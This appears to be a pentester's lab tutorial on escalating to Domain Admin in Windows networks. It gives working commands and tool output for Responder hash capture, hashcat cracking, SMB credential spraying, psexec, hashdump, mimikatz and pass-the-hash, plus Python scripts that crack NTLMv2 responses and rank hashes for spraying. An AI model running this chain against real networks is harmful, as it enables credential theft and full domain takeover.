Hunt for the Domain Admin (DA)

OK, this is a quick intro into how the DA account can be captured during pentests. In over 85% of the tests I have completed, the process I'm going to document has resulted in collecting accounts with DA privileges.


Just for the record, authentication with DA rights should not be used except to set up a domain, and to administer it once all else has failed and the shit has hit the fan.


Admins should instead use a delegation of privileges model, which you can read about in more detail here https://technet.microsoft.com/en-us/library/cc754542(v=ws.11).aspx and here https://technet.microsoft.com/en-us/library/2007.02.activedirectory.aspx. The reality is that most IT-administered environments issue admins with DA rights so they can change users' passwords and install programs. This level of rights is not required for such tasks, and this free allocation of DA rights results in pentesters, or any potential attacker, getting access to your highest privileged accounts.

Lecture over. Quick flow of each stage:

1.    Collection of standard user domain credentials. (Password hashes)
2.    Cracking standard user domain credentials. (Password hashes)
3.    Using standard user domain credentials to identify misconfigured local network services.
4.    Access to local admin account.
5.    Enumeration of users with DA rights.
6.    Access to machines with authenticated DA right users.
7.    Post exploitation to reveal authenticated users passwords.
8.    Access to local domain controller (DC) using collected DA account.
9.    Clone all hashes off the DC.

Detailed flow of each stage. (Note: Nessus and Nmap are not used at any point.) Nothing against either tool, but vuln and port scans will not aid you in getting DA around 99% of the time.

•    Collection of standard user domain credentials. (Password hashes)

Responder – amazing tool. On every internal pentest I do, after plugging in my laptop I fire up Responder and wait.

https://github.com/lgandx/Responder.git

Responder is built into Kali, as we all know, but you will be missing the updates, so personally I just clone it directly from Git.

[Thu Feb 16 09:06:18] root@kali:~ # git clone https://github.com/lgandx/Responder.git

Cloning into 'Responder'...

remote: Counting objects: 874, done.
remote: Total 874 (delta 0), reused 0 (delta 0), pack-reused 874
Receiving objects: 100% (874/874), 538.71 KiB | 539.00 KiB/s, done.
Resolving deltas: 100% (571/571), done.
Checking connectivity... done.

[Thu Feb 16 09:06:33] root@kali:~ # cd Responder/

How to start Responder

[Thu Feb 16 09:07:22] root@kali:~/Responder # python Responder.py -I eth0 -w -r -f
__
.----.-----.-----.-----.-----.-----.--|  |.-----.----.
|   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
|__| |_____|_____|   __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 2.3

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C

[+] Poisoners:
LLMNR                      [ON]
NBT-NS                     [ON]
DNS/MDNS                   [ON]

[+] Servers:
HTTP server                [ON]
HTTPS server               [ON]
WPAD proxy                 [ON]
SMB server                 [ON]
Kerberos server            [ON]
SQL server                 [ON]
FTP server                 [ON]
IMAP server                [ON]
POP3 server                [ON]
SMTP server                [ON]
DNS server                 [ON]
LDAP server                [ON]

[+] HTTP Options:
Always serving EXE         [OFF]
Serving EXE                [OFF]
Serving HTML               [OFF]
Upstream Proxy             [OFF]

[+] Poisoning Options:
Analyze Mode               [OFF]
Force WPAD auth            [OFF]
Force Basic Auth           [OFF]
Force LM downgrade         [OFF]
Fingerprint hosts          [ON]

[+] Generic Options:
Responder NIC              [eth0]
Responder IP               [192.168.1.5]
Challenge set              [1122334455667788]

[+] Listening for events...

Now wait for hashes. Below shows a captured NTLMv2-SSP response. The line is already in the format hashcat mode 5600 expects, user::domain:server challenge:NTProofStr:blob, and the server challenge is Responder's fixed default of 1122334455667788 (set in Responder.conf).

[SMB] NTLMv2-SSP Client   : 192.168.1.3
[SMB] NTLMv2-SSP Username : IE11WIN7\IEUser
[SMB] NTLMv2-SSP Hash     : IEUser::IE11WIN7:1122334455667788:D3F4B5D0F081F43AE71A46ED64BA5A98:010100000000000002BDBCAA3488D2018198E251A2557E870000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000001000000002000000476FD373573469EF2188CA9C996B02FC9E4AEC547831E0169BE7ADBC44F16310A001000000000000000000000000000000000000900200063006900660073002F003100390032002E003100360038002E0031002E0035000000000000000000

The machine used to collect this hash is from my own VM lab, which is built from the default Windows VMs available here https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

You can copy and paste the above hash into a notepad, or find the collected hashes in the Responder/logs directory.

[Thu Feb 16 09:13:45] root@kali:~/Responder/logs # more SMB-NTLMv2-SSP-192.168.1.3.txt
IEUser::IE11WIN7:1122334455667788:D3F4B5D0F081F43AE71A46ED64BA5A98:010100000000000002BDBCAA3488D2018198E251A2557E870000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D004200310032000300
0A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000001000000002000000476FD373573469EF2188CA9C996B02FC9E4AEC547831E0169BE7ADBC44F16310A00100000000000000000000000000000000000090020006300690
0660073002F003100390032002E003100360038002E0031002E0035000000000000000000

So you have hashes from domain users; now it's time to crack them.

•    Cracking standard user domain credentials. (Password hashes)

Rocktastic was created to replicate domain users' password choices. I'm not going to hammer on about it much, apart from saying I created it and I am proud of it. Read about it here https://myexploit.wordpress.com/2015/06/13/rocktastic-one-billion-unique-word-combination-password-dictionary/ or here https://labs.nettitude.com/tools/rocktastic/

You can download it here https://labs.nettitude.com/tools/rocktastic/ or https://docs.google.com/uc?id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU&export=download

I now use hashcat to crack passwords. I used to use John; if you do use John you need to use the 64-bit version, because the 32-bit version will not accept password lists that are over a certain size.

Hashcat switches

NTLMv2 -m 5600
NTLMv1 -m 5500

cudaHashcat64.exe -m 5600 C:\Users\test\User_Hashes.txt C:\Users\test\Wordlists\Rocktastic12a  --outfile=C:\Users\test\Hashes1CrackedTest1.txt --potfile-disable
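The captured line above and the hashcat command here are two ends of one calculation, so as an added example (my code, not from the original post, Responder or hashcat) here is the maths hashcat mode 5600 performs, in Python. It shows what each field of a Responder NTLMv2-SSP line contains and why a wordlist hit can be verified offline with nothing but the captured line. MD4 is implemented inline because hashlib's md4 is missing on many current OpenSSL builds. SAMPLE_LINE is constructed from a known password with a made-up client challenge, timestamp and target info; PAGE_LINE is the capture shown above, broken into its fields with comments.

```python
import hashlib
import hmac
import struct


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320). Inline because hashlib's md4 is often unavailable on OpenSSL 3."""
    mask = 0xFFFFFFFF
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, X[] index order, shift amounts)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for f, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + f(b, c, d) + X[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(x + y) & mask for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). Unsalted: equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le"))


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP 3.3.2: HMAC-MD5 keyed by NTOWFv2 over server challenge || blob.
    NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)), so the domain field matters."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def ntlmv2_blob(client_challenge: bytes, target_info: bytes, filetime: int = 0) -> bytes:
    """The 'temp' structure: RespType, HiRespType, 6 reserved, FILETIME, client challenge,
    4 reserved, AV pairs, 4 reserved. This is the last field of a Responder/hashcat line."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def responder_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Build a user::domain:challenge:NTProofStr:blob line as Responder writes it."""
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_ntlmv2(line: str, wordlist):
    """Return the candidate whose NTProofStr matches the line, or None (hashcat -m 5600 maths)."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    chal_b, proof_b, blob_b = (bytes.fromhex(x) for x in (chal, proof, blob))
    for cand in wordlist:
        if hmac.compare_digest(nt_proof(cand, user, domain, chal_b, blob_b), proof_b):
            return cand
    return None


RESPONDER_CHALLENGE = bytes.fromhex("1122334455667788")  # Responder's fixed default challenge
# Constructed target info: one AV pair (MsvAvNbDomainName = "IE11WIN7") followed by MsvAvEOL.
_NAME = "IE11WIN7".encode("utf-16-le")
_TARGET_INFO = struct.pack("<HH", 2, len(_NAME)) + _NAME + struct.pack("<HH", 0, 0)
SAMPLE_LINE = responder_line("IEUser", "IE11WIN7", "Passw0rd!", RESPONDER_CHALLENGE,
                             ntlmv2_blob(b"\xaa" * 8, _TARGET_INFO, 131315000000000000))

# The capture from the Responder log above, split into the fields the blob actually carries.
PAGE_LINE = "IEUser::IE11WIN7:1122334455667788:D3F4B5D0F081F43AE71A46ED64BA5A98:" + (
    "0101000000000000"                  # RespType 1, HiRespType 1, 6 reserved bytes
    "02BDBCAA3488D201"                  # FILETIME, little-endian (Feb 2017)
    "8198E251A2557E87"                  # client challenge: the client's own randomness
    "00000000"
    "02000A0053004D00420031003200"      # AV 2 NbDomainName   = "SMB12" (Responder's served name)
    "01000A0053004D00420031003200"      # AV 1 NbComputerName = "SMB12"
    "04000A0053004D00420031003200"      # AV 4 DnsDomainName  = "SMB12"
    "03000A0053004D00420031003200"      # AV 3 DnsComputerName = "SMB12"
    "05000A0053004D00420031003200"      # AV 5 DnsTreeName    = "SMB12"
    "0800300030000000000000000100000000200000"
    "0476FD373573469EF2188CA9C996B02FC9E4AEC547831E0169BE7ADBC44F1631"  # AV 8 SingleHost
    "0A001000" "00000000000000000000000000000000"  # AV 10 ChannelBindings, all zero
    "0900200063006900660073002F003100390032002E003100360038002E0031002E003500"  # AV 9 "cifs/192.168.1.5"
    "0000000000000000"                  # MsvAvEOL + trailing 4 reserved bytes
)

if __name__ == "__main__":
    print("constructed line ->", crack_ntlmv2(SAMPLE_LINE, ["Summer2017", "Passw0rd!"]))
    print("captured line    ->", crack_ntlmv2(PAGE_LINE, ["Passw0rd!"]))
```

Two things worth noticing from the code: the fixed 1122334455667788 challenge is harmless for NTLMv2 because the client mixes in its own challenge, but for NTLMv1 (-m 5500) the response depends only on the server challenge, which is why precomputed tables for that exact challenge exist; and the domain field on the line is part of the key, so if a capture refuses to crack, check that the domain Responder logged is what the client actually sent rather than assuming the wordlist is at fault.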

Credentials cracked, now to use them.

•    Using standard user domain credentials to identify misconfigured local network services.

For this I use metasploit with the auxiliary/scanner/smb/smb_login module and the following switches.

set SMBDomain The-Domain-Name
set SMBUser The-Cracked-Users-Domain-Username
set SMBPass The-Cracked-Users-Domain-Password
set RHOSTS 192.168.0.0/24 Change-as-required
set threads 20
run

This sprays the subnet, attempting to authenticate to every host over SMB. Any successful authentication is interesting, but it is a success followed by the word Administrator that matters most, see below.

[+] 192.168.0.22:445 SMB - Success: 'TestDomain\IEUser:Passw0rd1' Administrator

This means the account is a local admin on that machine (smb_login reports Administrator when the login was able to open the administrative ADMIN$ share), so you can use exploit/windows/smb/psexec with it.

•    Access to local admin account.

Using psexec in metasploit, use the following switches:

msf auxiliary(smb_login) > use exploit/windows/smb/psexec

set SMBDomain The-Domain-Name
set SMBUser The-Cracked-Users-Domain-Username
set SMBPass The-Cracked-Users-Domain-Password
set RHOST 192.168.0.22 Change-as-required
run

Typically this fails and needs to be run twice, so don't give up if it fails the first time.

If you want to lab this on a Windows 7 box you need to tweak the registry first. psexec fails here because of UAC remote restrictions: when a local account that is a member of the Administrators group (other than the built-in RID 500 Administrator) authenticates over the network, Windows gives it a filtered, non-admin token, so the ADMIN$ share and service creation are refused with STATUS_ACCESS_DENIED. Domain accounts in the local Administrators group are not filtered. Setting LocalAccountTokenFilterPolicy to 1 switches the filtering off; the following needs to be run in an administrator-privileged CMD session:

reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1

Following that psexec will work. Bear the same restriction in mind later when you spray with local account hashes: a non-RID-500 local account only gets admin access on machines where this key is set, while the built-in Administrator is exempt.

Before the above reg tweak

msf exploit(psexec) > run

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 192.168.1.3:445 - Connecting to the server...
[*] 192.168.1.3:445 - Authenticating to 192.168.1.3:445 as user 'IEUser'...
[-] 192.168.1.3:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[*] Exploit completed, but no session was created.

After the reg tweak

msf exploit(psexec) > run

[*] Started reverse TCP handler on 192.168.1.5:4444
[*] 192.168.1.3:445 - Connecting to the server...
[*] 192.168.1.3:445 - Authenticating to 192.168.1.3:445 as user 'IEUser'...
[*] 192.168.1.3:445 - Selecting PowerShell target
[*] 192.168.1.3:445 - Executing the payload...
[+] 192.168.1.3:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957999 bytes) to 192.168.1.3
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.3:49187) at 2017-02-16 09:53:43 +0000

Here is a vid of using the psexec mass sprayer https://www.youtube.com/watch?v=YI2ycgj9QvQ kind of wrong but also very cool; the script is by darkoperator: https://raw.githubusercontent.com/darkoperator/Meterpreter-Scripts/master/auxiliary/scanner/smb/psexec_scanner.rb

OK, so once you have a session via psexec you can use post exploitation modules (https://www.youtube.com/watch?v=dFYnfeE-alA). The most useful ones are:

run post/windows/gather/hashdump

run post/windows/gather/credentials/sso

run post/windows/gather/cachedump

hashdump gives you the local SAM hashes, including the local admin; sso is mimikatz, pulling the credentials of users currently logged on; cachedump dumps the cached domain logon verifiers, i.e. the last 10 domain users to log on by default (controlled by CachedLogonsCount). Those you then have to go on and crack, which takes ages because Vista and later store them as DCC2 (PBKDF2 over the NT hash) rather than the fast DCC1 of XP/2003, but they are a useful backup as the cache commonly contains admin accounts!

I use John for cachedump; it takes ages. You can use Hashcat, but it takes some googling to work out how to format the hashes, and as I don't commonly need to do this I don't keep notes on it.

john --wordlist=/root/Desktop/Password/Rocktastic.txt --format=mscash2 /root/Crackedpasswords

(--format=mscash is the DCC1 format from XP/2003; Vista and later, including the Windows 7 lab box here, store DCC2, which John cracks with --format=mscash2 and hashcat with -m 2100. Using mscash on a DCC2 dump will simply never find a hit.)

Below shows output from hashdump

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::

Once you have the hashes from hashdump, repeat the smb_login stage, this time using the local admin hash.

Windows does not salt its NT hashes, so two accounts with the same password have the same hash, and a hash lifted from one machine can be replayed to any other machine that accepts that account. Because machines are commonly cloned from a single image, the local admin hash on a clone is the same as on the original, so one hashdump often unlocks a large part of the estate.

NOTE – try the Administrator account, but also try all the other accounts in the hashdump afterwards, as I commonly find the Administrator account is disabled or only works on a few other machines, where a different account may work on almost all the local machines. Local accounts set up for AV are a common culprit for this bad practice.

You don't need to crack the local admin hashes, as Windows will accept the hash itself (pass-the-hash). Take the LM:NT part of the hashdump line, i.e. drop the user:RID prefix and the ::: off the end, and pass it as SMBPass, see below. The aad3b435b51404eeaad3b435b51404ee half is the LM hash of an empty string, which is what Windows stores when LM hashes are disabled; the NT half is the part that actually authenticates.

Use the auxiliary/scanner/smb/smb_login module again with the following switches.

set SMBDomain WORKGROUP (Important: change the domain back to WORKGROUP, because you are now using the local admin hash, not a domain account)
set SMBUser IEUser (Or whatever they named the account to)
set SMBPass aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
set RHOSTS 192.168.0.0/24 Change-as-required
set threads 20
run

Once you run this you should see many more machines with Administrator after them, meaning you can then access them with psexec.
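To show what the last two stages amount to in code, here is an added example (mine, not from the post or from Metasploit). It parses hashdump output in the user:rid:LM:NT::: format into the LM:NT value smb_login takes as SMBPass, drops empty-password hashes, ranks the remaining hashes by how many hosts share them (the clone-spotting point above), and pulls the psexec-able hosts out of smb_login's output using the line format shown on this page. The first hashdump is the one shown above; the second host, the avsvc account and its hash, and the smb_login output are constructed for the example.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": LM storage is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": blank password, usually a disabled account


def parse_hashdump(text):
    """Parse pwdump-style lines (user:rid:LM:NT:::) as printed by meterpreter's hashdump."""
    creds = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        creds.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt,
                      "smbpass": f"{lm}:{nt}"})  # exactly what smb_login/psexec take as SMBPass
    return creds


def pth_candidates(dumps):
    """dumps: {host: hashdump output}. Returns [(user, smbpass, hosts)] ordered so the hash seen
    on the most machines (a cloned image) is sprayed first. Blank-password hashes are dropped:
    they never authenticate over SMB and on RID 500 usually mean the account is disabled."""
    hosts_for = defaultdict(set)
    for host, text in dumps.items():
        for c in parse_hashdump(text):
            if c["nt"] == EMPTY_NT:
                continue
            hosts_for[(c["user"], c["smbpass"])].add(host)
    ranked = sorted(hosts_for.items(), key=lambda kv: (-len(kv[1]), kv[0]))
    return [(user, smbpass, sorted(hosts)) for (user, smbpass), hosts in ranked]


# Matches the smb_login success line format shown on this page; the trailing word
# "Administrator" is what marks a host as a psexec target.
SUCCESS_RE = re.compile(
    r"\[\+\]\s+(?P<host>\d{1,3}(?:\.\d{1,3}){3}):\d+.*?Success:\s+'(?P<cred>[^']+)'(?P<admin>\s+Administrator)?")


def admin_hosts(msf_output):
    """Hosts where smb_login printed the Administrator suffix."""
    matches = (SUCCESS_RE.search(line) for line in msf_output.splitlines())
    return sorted(m.group("host") for m in matches if m and m.group("admin"))


# Constructed sample data: the hashdump from above, plus a second box built from the same image
# (same IEUser hash) with an extra AV service account. The avsvc hash is made up for the example.
DUMPS = {
    "192.168.0.22": """Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::""",
    "192.168.0.37": """Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
avsvc:1001:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::""",
}

# Constructed smb_login output from spraying the IEUser hash with SMBDomain set to WORKGROUP.
SMB_LOGIN_OUTPUT = """[*] 192.168.0.0/24:445 - Scanning...
[+] 192.168.0.22:445 SMB - Success: 'WORKGROUP\\IEUser:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889' Administrator
[+] 192.168.0.37:445 SMB - Success: 'WORKGROUP\\IEUser:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889' Administrator
[+] 192.168.0.40:445 SMB - Success: 'WORKGROUP\\IEUser:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889'
[-] 192.168.0.41:445 SMB - Failed: 'WORKGROUP\\IEUser:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889', STATUS_LOGON_FAILURE"""

if __name__ == "__main__":
    for user, smbpass, hosts in pth_candidates(DUMPS):
        print(f"set SMBUser {user}\nset SMBPass {smbpass}   # seen on {len(hosts)} host(s): {', '.join(hosts)}")
    print("psexec targets:", admin_hosts(SMB_LOGIN_OUTPUT))
```

192.168.0.40 authenticates but is not flagged Administrator, which is the UAC token-filtering case from the psexec section: the account is valid there, but without LocalAccountTokenFilterPolicy (or RID 500) you get a filtered token and psexec will be refused.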

•    Enumeration of users with DA rights.

The local admin hashes from one box commonly give you access to a lot of the machines; you can psexec to them all and collect all the local admin hashes, as sometimes I find you will see different accounts which in turn give you access to machines you didn't have access to before, and so on. But at this point I commonly use smbexec to hunt out users with DA rights.

https://github.com/pentestgeek/smbexec

Kali is fragile and any installed program increases the risk of breaking it. I found the following helps fix Ruby issues following the install of smbexec:

root@kali:/opt/smbexec# smbexec
cannot load such file -- nmap/xml

Load error: Make sure the Ruby gems are installed properly, run bundle install

/opt/smbexec# apt-get install ruby-dev
/opt/smbexec# bundle install

1.) Download SMBExec 2.0 (https://github.com/brav0hax/smbexec)
cd /opt
git clone https://github.com/brav0hax/smbexec.git

2.) Install the mingw32 packages (http://www.mingw.org/)
apt-get install mingw32

3.) Change to /opt/smbexec
./install.sh
(Choose Option 1 for KALI Linux 2.0)

4.) Get Version 1.0 of NTDSXtract (http://www.ntdsxtract.com/)
wget http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

5.) Remove the installed version (1.3.3) of NTDSXtract and replace it with 1.0
cd /opt
rm -rf NTDSXtract
unzip ntdsxtract_v1_0.zip
mv "NTDSXtract 1.0" NTDSXtract

Now it should be ready to run.

[Thu Feb 16 10:02:55] root@kali:~ # smbexec
[*] Checking if all external dependancies exist...

winexe version 1.1
This program may be freely redistributed under the terms of the GNU GPLv3
[!] /opt/esedbtools/esedbexport does not exists, functionality may break. Update smbexec.yml with correct path.

Press enter to continue

**********************************************************************
*                    smbexec 2.0 - Machiavellian                     *
**********************************************************************

Main Menu

1. System Enumeration                              No hosts identified
2. System Exploitation                         No credentials provided
3. Obtain Hashes                                      No pass provided
4. Options
5. Exit

Choice : 1

**********************************************************************
*                    smbexec 2.0 - Machiavellian                     *
**********************************************************************

System Enumeration Menu

1. Create a host list                              No hosts identified
2. Check systems for Domain Admin              No credentials provided
3. Check systems for logged in users                  No pass provided
4. Check systems for UAC
5. Enumerate Shares
6. File Finder
7. Remote login validation
8. Main menu

Choice : 2

Identify Domain Admin processes/logins.

Target IP, host list, or nmap XML file [No hosts identified] : 192.168.0.0/24
Username [No credentials provided] : IEUser
Password or hash (<LM>:<NTLM>) [No pass provided] : aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889
Domain [LOCALHOST] : (Just press enter)

Domain Admins Status

Then wait while it scans the subnet using the local admin creds. If any user with DA rights is logged on to, or has a process running on, a machine you can access with the local admin account, it will show you.

This commonly is the case and does not require you to crack the local admin password, which is great.

OK, so once you have found a user or two with DA rights:

•    Access to machines with authenticated DA right users.

Psexec to that machine and use mimikatz

msf exploit(psexec) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf exploit(psexec) > set smbuser IEUser
smbuser => IEUser
msf exploit(psexec) > set smbpass Passw0rd!
smbpass => Passw0rd!
msf exploit(psexec) > run

Using mimikatz via the SSO post script

meterpreter > run post/windows/gather/credentials/sso

[*] Running module against IE11WIN7
Windows SSO Credentials
=======================

AuthID   Package  Domain    User    Password
------   -------  ------    ----    --------
0;89998  NTLM     IE11WIN7  IEUser  Passw0rd!
0;89998  NTLM     IE11WIN7  IEUser
0;91060  NTLM     IE11WIN7  IEUser  Passw0rd!
0;91060  NTLM     IE11WIN7  IEUser

And there you go you’re now the owner of a shiny DA account!

You can now psexec to the DC using the DA account, or RDP to it. To hunt out the DC, drop down to a CMD shell and run ipconfig /all and look at the DNS Servers, as in a domain these are typically the DCs. The reason is that when you create Active Directory Domain Services it offers to install DNS as well, and most people simply type dcpromo and press next, next, next as many times as they can, resulting in a default build of the DC with DNS enabled. ;0) A more reliable check from any domain-joined box is nltest /dsgetdc:<domain>, or nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>, which lists every DC regardless of where DNS is hosted.

Hope this helped.

Quick tool flow of each stage.

1. Collection of standard user domain credentials. Responder
2. Cracking standard user domain credentials. Hashcat / Rocktastic
3. Using standard user domain credentials to identify misconfigured local network services. MSF / SMB_Login
4. Access to local admin account. MSF Hashdump
5. Enumeration of users with DA rights. SMBexec
6. Access to machines with authenticated DA right users. MSF / PSEXEC
7. Post exploitation to reveal authenticated users passwords. MSF / mimikatz
8. Access to local domain controller (DC) using collected DA account. MSF / PSEXEC or RDP
9. Clone all hashes off the DC. MSF / Hashdump